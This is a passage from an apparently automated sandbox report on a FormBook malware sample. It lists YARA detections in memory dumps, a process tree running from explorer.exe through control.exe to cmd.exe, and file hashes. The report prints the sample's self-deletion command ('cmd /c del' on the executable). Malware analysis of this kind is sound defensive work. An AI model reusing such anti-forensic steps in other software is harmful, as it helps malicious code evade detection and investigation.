                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 3416

                                                                  General

                                                                  Start time:15:46:49
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff6fee60000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: control.exe PID: 6576 Parent PID: 3424

                                                                  General

                                                                  Start time:15:47:10
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\control.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\control.exe
                                                                  Imagebase:0x3c0000
                                                                  File size:114688 bytes
                                                                  MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Analysis Process: cmd.exe PID: 6260 Parent PID: 6576

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0x11d0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: conhost.exe PID: 7160 Parent PID: 6260

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >